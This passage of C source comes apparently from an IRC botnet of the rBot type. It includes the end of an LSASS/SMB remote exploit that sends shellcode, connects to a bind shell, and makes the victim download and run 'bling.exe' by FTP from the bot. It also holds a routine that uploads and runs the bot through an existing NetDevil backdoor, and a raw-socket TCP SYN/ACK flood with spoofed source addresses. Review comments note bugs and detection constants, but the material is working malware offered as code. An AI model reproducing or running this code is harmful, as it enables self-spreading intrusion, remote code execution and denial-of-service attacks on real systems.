	if (fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin)) == -1) {
		fclosesocket(sSocket);
		return FALSE;
	}

	// SMB session setup: six canned requests, each reply read and discarded
	if (fsend(sSocket, reqx1, sizeof(reqx1)-1, 0) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}
	len = frecv(sSocket, recvbuf, 1600, 0);

	if (fsend(sSocket, reqx2, sizeof(reqx2)-1, 0) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}
	len = frecv(sSocket, recvbuf, 1600, 0);

	if (fsend(sSocket, reqx3, sizeof(reqx3)-1, 0) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}
	len = frecv(sSocket, recvbuf, 1600, 0);

	if (fsend(sSocket, req4u, smblen+4, 0) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}
	len = frecv(sSocket, recvbuf, 1600, 0);

	if (fsend(sSocket, reqx5, sizeof(reqx5)-1, 0) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}
	len = frecv(sSocket, recvbuf, 1600, 0);

	if (fsend(sSocket, reqx6, sizeof(reqx6)-1, 0) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}
	len = frecv(sSocket, recvbuf, 1600, 0);

	if ((targetx == 1) || (targetx == 2)) {
		// two-request variant: the widened buffer is split across reqx8 (4348 bytes) and reqx9 (4060 bytes)
		memcpy(screq2k, reqx8, sizeof(reqx8)-1);
		memcpy(screq2k+sizeof(reqx8)-1, sendbuf, (LEN+1)*2);

		memcpy(screq2k2, reqx9, sizeof(reqx9)-1);
		memcpy(screq2k2+sizeof(reqx9)-1, sendbuf+4348-sizeof(reqx8)+1, (LEN+1)*2-4348);

		memcpy(screq2k2+sizeof(reqx9)-1+(LEN+1)*2-4348-sizeof(reqx8)+1+206, shitx3, sizeof(shitx3)-1);

		if (fsend(sSocket, screq2k, 4348, 0) == SOCKET_ERROR) {
			fclosesocket(sSocket);
			return FALSE;
		}
		len = frecv(sSocket, recvbuf, 1600, 0);

		if (fsend(sSocket, screq2k2, 4060, 0) == SOCKET_ERROR) {
			fclosesocket(sSocket);
			return FALSE;
		}

	} else {
		// single-request variant: reqx7 header, strBuffer, then 144 bytes of shitx1
		memcpy(screq, reqx7, sizeof(reqx7)-1);
		memcpy(screq+sizeof(reqx7)-1, &strBuffer[0], BUFSIZE);
		memcpy(screq+sizeof(reqx7)-1+BUFSIZE, shitx1, 9*16);

		screq[BUFSIZE+sizeof(reqx7)-1+1500-304-1] = 0;
		if (fsend(sSocket, screq, BUFSIZE+sizeof(reqx7)-1+1500-304, 0) == SOCKET_ERROR) {
			fclosesocket(sSocket);
			return FALSE;
		}
	}

	len = frecv(sSocket, recvbuf, 1600, 0);

	// second connection: the bind shell the payload should now be listening on
	if ((bSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}

	memset(&bsin, 0, sizeof(bsin));
	bsin.sin_family = AF_INET;
	bsin.sin_port = fhtons(LSASS_BSPORT);
	bsin.sin_addr.s_addr = finet_addr(exinfo.ip);

	if (fconnect(bSocket, (LPSOCKADDR)&bsin, sizeof(bsin)) == -1) {
		fclosesocket(sSocket);
		fclosesocket(bSocket);
		return FALSE;
	}

	// any bytes from the shell (its prompt) are treated as success; the payload is
	// then told to fetch bling.exe from this bot (GetIP of the IRC socket) via an FTP script
	if (frecv(bSocket, recvbuf, 1600, 0) > 0) {
		Sleep(500);

		_snprintf(cmd_buff, sizeof(cmd_buff),
	//		"tftp -i %s get %s&%s&exit\n", GetIP(exinfo.sock), filename, filename);
			"echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n",
		GetIP(exinfo.sock),FTP_PORT);	
	
		if (fsend(bSocket, cmd_buff, strlen(cmd_buff), 0) == SOCKET_ERROR) {
			fclosesocket(sSocket);
			fclosesocket(bSocket);
			return FALSE;
		}

		fclosesocket(sSocket);
		fclosesocket(bSocket);

		_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
		if (!exinfo.silent)
			irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
		addlog(buffer);
		exploit[exinfo.exploit].stats++;

		return TRUE;
	} else
		return FALSE;	// NOTE(review): sSocket and bSocket are leaked on this path
}
Пример #29
// Pushes this bot's own executable (GetModuleFileName) to a host that already runs a
// "NetDevil" backdoor: asks the control connection `ssock` for its version string (which
// may also carry an upload port), opens a data connection to that port (903 when none was
// parsed), streams the file in 1024-byte chunks to C:\<filename>, and finally asks the
// backdoor to execute it ("pleaz_run"). Protocol strings are the backdoor's own.
//
// IP:    target address for the data connection (passed to CreateSock()).
// ssock: already-open control socket; closed on every path before returning.
// Returns 1 when the backdoor acknowledged with "pleaz_run_done", else 0.
//
// NOTE(review): defects observable here, kept as-is -
//  - strrchr(buffer, '\n\r') passes a multi-character constant; its value is
//    implementation-defined, so the port parse presumably rarely matches.
//  - `ver` from strtok() is unused; strtok() also mutates `buffer` before the strcmp.
//  - nsock is closed after the upload loop and then read from again for the
//    "pleaz_run_done" reply (and closed a second time at `end` if that read fails).
//  - `testfile` is not closed on the goto-end paths after it was opened.
//  - the sprintf() calls into the 1024-byte `buffer` and MAX_PATH `rFile` are unbounded.
int NetDevil_Upload(char *IP, SOCKET ssock)
{
	SOCKET nsock;
	char buffer[1024], botfile[MAX_PATH], rFile[MAX_PATH];

	int port = 0,bytes_sent = 0;
	unsigned int Fsend = 1024, Fsize, move;
	DWORD mode = 0;	// receives the byte count from ReadFile

	BOOL ver15 = FALSE;

	GetModuleFileName(NULL, botfile, sizeof(botfile));

	// version handshake on the control connection
	fsend(ssock, "version", 7, 0);
	memset(buffer,0,sizeof(buffer));
	frecv(ssock, buffer, sizeof(buffer), 0);
	if (strlen(buffer) > 5) {
		buffer[strlen(buffer)-2] = '\0';
		char *uPort = strrchr(buffer, '\n\r');	// multi-char constant, see header note
		if (uPort != NULL) 
			port = atoi(uPort);
	}

	char *ver = strtok(buffer,"\n\r");
	if (strcmp(buffer,"ver1.5") == 0) 
		ver15 = TRUE; 
	sprintf(rFile,"C:\\%s",filename);

	port = ((port == 0)?(903):(port));
	if ((nsock = CreateSock(IP,port)) == INVALID_SOCKET) 
		goto end;

	HANDLE testfile; 
	if ((testfile = CreateFile(botfile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0)) == INVALID_HANDLE_VALUE) 
		goto end;
	Fsize = GetFileSize(testfile,NULL);

	// announce the upload; the 1.5 protocol includes the size, the older one expects an ack per chunk
	if (ver15)
		sprintf(buffer,"cmd[003]%s|%i|\n\r",rFile,Fsize);
	else
		sprintf(buffer,"%s\r1",rFile);
	fsend(nsock, buffer, strlen(buffer), 0);
	if (frecv(nsock, buffer, sizeof(buffer), 0) < 1) 
		goto end;

	// send the file from the end backwards by remaining size: seek to -Fsize from EOF,
	// read Fsend bytes, subtract what was actually sent
	while (Fsize) {
		memset(buffer,0,sizeof(buffer));

		if (Fsend>Fsize) 
			Fsend=Fsize;
		move = 0-Fsize;

		SetFilePointer(testfile, move, NULL, FILE_END);
		ReadFile(testfile, buffer, Fsend, &mode, NULL);	// return value unchecked
		bytes_sent = fsend(nsock, buffer, Fsend, 0);
		if (bytes_sent == SOCKET_ERROR) {
			if (fWSAGetLastError() != WSAEWOULDBLOCK) 
				goto end;
			else 
				bytes_sent = 0;	// would-block: retry the same chunk next iteration
		}
		Fsize = Fsize - bytes_sent;

		if (!ver15 && frecv(nsock, buffer, sizeof(buffer), 0) < 1) 
			goto end;
	}

	if (testfile != INVALID_HANDLE_VALUE) 
		CloseHandle(testfile);
	fclosesocket(nsock);
	Sleep(2000);

	// ask the backdoor to run the uploaded file; the reply is read from the already-closed nsock
	sprintf(buffer,"pleaz_run%s",rFile);
	fsend(ssock, buffer,strlen(buffer), 0);
	memset(buffer,0,sizeof(buffer));
	if (frecv(nsock, buffer, sizeof(buffer), 0) < 1) 
		goto end;
	if (strcmp(buffer,"pleaz_run_done") != 0) 
		goto end;

	Sleep(4000);
	fclosesocket(ssock);

	return 1;

	end:;
	fclosesocket(nsock);
	fclosesocket(ssock);

	return 0;
}
Пример #30
// DDoS thread: floods tcpflood.ip with hand-built TCP SYN/ACK packets from a raw socket
// (IP_HDRINCL, so the bot supplies its own IP header) for tcpflood.time seconds, optionally
// with a random spoofed source address, and reports the outcome to the IRC channel.
// Never returns normally - every path ends in clearthread() + ExitThread(0).
//
// param: pointer to a TCPFLOOD; copied locally, then gotinfo is set for the spawner.
//
// Detection notes, all constant in the code below: IP ident=1, ttl=128, TCP window=512,
// seq=0x12345678, ack_seq 0 (or 0..2 for "random"), source and destination ports always
// in 0..1024, and every datagram is exactly sizeof(szSendBuf) = 60 bytes regardless of
// sizeof(ipHeader)+sizeof(tcpHeader), with the tail zero-filled.
//
// NOTE(review): if tcpflood.type matches none of "syn"/"ack"/"random", tcpHeader.flags and
// ack_seq are never assigned (tcpHeader is an uninitialized local).
// NOTE(review): ssock is not closed on the setsockopt() and invalid-IP exits.
// NOTE(review): the summary line divides by tcpflood.time; with time == 0 the loop still
// runs once and the division is by zero.
// NOTE(review): the IP checksum is computed over IP+TCP headers rather than the IP header
// alone - whether the sending stack rewrites it cannot be determined from here.
DWORD WINAPI TcpFloodThread(LPVOID param) 
{
	TCPFLOOD tcpflood = *((TCPFLOOD *)param);
	TCPFLOOD *tcpfloods = (TCPFLOOD *)param;
	tcpfloods->gotinfo = TRUE;	// signal the spawner that param has been copied

	char sendbuf[IRCLINE], szSendBuf[60]={0};

	IPHEADER ipHeader; 
	TCPHEADER tcpHeader; 
	PSDHEADER psdHeader; 	// pseudo-header used only for the TCP checksum

	srand(GetTickCount());

	SOCKET ssock;
	if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) {
		sprintf(sendbuf,"[TCP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
		if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
		addlog(sendbuf);

		clearthread(tcpflood.threadnum);

		ExitThread(0);
	}
	
	// IP_HDRINCL: the buffer handed to sendto() starts with our own IP header
	BOOL flag = TRUE; 
	if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) { 
		sprintf(sendbuf,"[TCP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError());
		if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
		addlog(sendbuf);

		clearthread(tcpflood.threadnum);

		ExitThread(0);
	} 

	if (finet_addr(tcpflood.ip) == INADDR_NONE) {
		sprintf(sendbuf,"[TCP]: Invalid target IP.");
		if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
		addlog(sendbuf);

		clearthread(tcpflood.threadnum);

		ExitThread(0);
	}

	SOCKADDR_IN ssin;
	memset(&ssin, 0, sizeof(ssin));	
	ssin.sin_family=AF_INET; 
	ssin.sin_port=fhtons(0); 
	ssin.sin_addr.s_addr=finet_addr(tcpflood.ip); 

	int sent = 0;
	unsigned long start = GetTickCount();

	// run until tcpflood.time seconds have elapsed (at least one iteration)
	while (((GetTickCount() - start) / 1000) <= (unsigned long)tcpflood.time) {
		ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); 
		ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader)); 
		ipHeader.ident=1; 
		ipHeader.frag_and_flags=0; 
		ipHeader.ttl=128; 
		ipHeader.proto=IPPROTO_TCP; 
		ipHeader.checksum=0; 
		// spoof: four rand() values packed into 32 bits; otherwise this bot's own IP
		ipHeader.sourceIP=((tcpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(tcpflood.sock))));
		ipHeader.destIP=ssin.sin_addr.s_addr;
		
		// port 0 means "random privileged-range port" (0..1024) per packet
		((tcpflood.port == 0)?(tcpHeader.dport=fhtons((unsigned short)(rand()%1025))):(tcpHeader.dport=fhtons(tcpflood.port))); 
		tcpHeader.sport=fhtons((unsigned short)(rand()%1025));  
		tcpHeader.seq=fhtonl(0x12345678); 
		if (strstr(tcpflood.type,"syn")) {
			tcpHeader.ack_seq=0;
			tcpHeader.flags=SYN;
		} else if (strstr(tcpflood.type,"ack")) {
			tcpHeader.ack_seq=0;
			tcpHeader.flags=ACK;
		} else if (strstr(tcpflood.type,"random")) {
			tcpHeader.ack_seq=rand()%3;
			((rand()%2 == 0)?(tcpHeader.flags=SYN):(tcpHeader.flags=ACK));
		}
		tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0); 	// data offset in 32-bit words, reserved bits 0
		tcpHeader.window=fhtons(512); 
		tcpHeader.urg_ptr=0; 
		tcpHeader.checksum=0;
		
		// TCP checksum over pseudo-header + TCP header (no payload)
		psdHeader.saddr=ipHeader.sourceIP; 
		psdHeader.daddr=ipHeader.destIP; 
		psdHeader.zero=0; 
		psdHeader.proto=IPPROTO_TCP; 
		psdHeader.length=fhtons((unsigned short)(sizeof(tcpHeader))); 

		memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); 
		memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader)); 
		tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)); 
		// now assemble the real packet: IP header, TCP header, 4 zero bytes
		memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); 
		memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader)); 
		memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4); 
		ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)); 
		memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); 

		// the whole 60-byte buffer is sent, not just the headers
		if (fsendto(ssock, (char *)&szSendBuf, sizeof(szSendBuf), 0, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) { 
			fclosesocket(ssock);

			_snprintf(sendbuf,sizeof(sendbuf),"[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", tcpflood.ip, sent, fWSAGetLastError());
			if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice); 
			addlog(sendbuf);

			clearthread(tcpflood.threadnum);

			ExitThread(0);
		}
		sent++;
	}
	fclosesocket(ssock);

	// KB/sec and MB figures are derived from sent * 60 bytes; divides by tcpflood.time
	sprintf(sendbuf,"[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", tcpflood.type, tcpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / tcpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024));
	if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice); 
	addlog(sendbuf);

	clearthread(tcpflood.threadnum);

	ExitThread(0); 
}